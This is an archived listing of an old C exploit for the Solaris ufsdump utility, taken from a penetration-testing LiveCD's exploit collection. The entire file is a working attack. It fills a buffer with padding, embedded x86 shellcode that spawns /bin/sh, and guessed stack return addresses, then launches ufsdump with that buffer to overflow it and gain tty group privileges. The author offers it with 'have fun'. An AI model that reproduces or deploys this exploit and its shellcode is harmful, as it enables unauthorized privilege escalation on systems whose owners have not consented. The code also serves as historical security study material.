home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / ufsdump1.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  53 lines

  1. /* ufsdump.c
  2.  * Description:  Overflows a buffer to give you EGID=tty.  
  3.  * At least that's what id reports.
  4.  * The running shell thinks its still the user.  Maybe I'm 
  5.  * doing something wrong?  At any
  6.  * rate,  here ya go, have fun.
  7.  *  
  8.  *  smm@wpi.edu
  9.  *  Thanks to: Jesse Schachter for the box, and 
  10.  *  Unknown parties for the shellcode. (probably Aleph1).
  11.  */
  12.  
  13. #include <stdio.h>
  14. static inline getesp()
  15. {
  16.   __asm__(" movl %esp,%eax ");
  17. }
  18. main(int argc, char **argv)
  19. {
  20.   int i,j,buffer,offset;
  21.   long unsigned esp;
  22.   char unsigned buf[4096];
  23.   unsigned char
  24.   shellcode[]=
  25.     "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3"
  26.     "\x33\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05"
  27.     "\x07\x88\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff"
  28.     "\xff\x0f\x0f\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46"
  29.     "\x0c\x50\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff"
  30.     "\x83\xc4\x0c\x6a\x01\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4"
  31.     "\xff\xff\xff/bin/sh";
  32.   buffer=895;
  33.   offset=3500;
  34.   if (argc>1)buffer=atoi(argv[1]);
  35.   if (argc>2)offset=atoi(argv[2]);
  36.   for (i=0;i<buffer;i++)
  37.     buf[i]=0x41;  /* inc ecx */
  38.   j=0;
  39.   for (i=buffer;i<buffer+strlen(shellcode);i++)
  40.     buf[i]=shellcode[j++];
  41.   esp=getesp()+offset;
  42.   buf[i]=esp & 0xFF;
  43.   buf[i+1]=(esp >> 8) & 0xFF;
  44.   buf[i+2]=(esp >> 16) & 0xFF;
  45.   buf[i+3]=(esp >> 24) & 0xFF;
  46.   buf[i+4]=esp & 0xFF;
  47.   buf[i+5]=(esp >> 8) & 0xFF;
  48.   buf[i+6]=(esp >> 16) & 0xFF;
  49.   buf[i+7]=(esp >> 24) & 0xFF;
  50.   printf("Offset: 0x%x\n\n",esp);
  51.   execl("/usr/lib/fs/ufs/ufsdump","ufsdump","1",buf,NULL);
  52. }
  53. /*                    www.hack.co.za              [2000]*/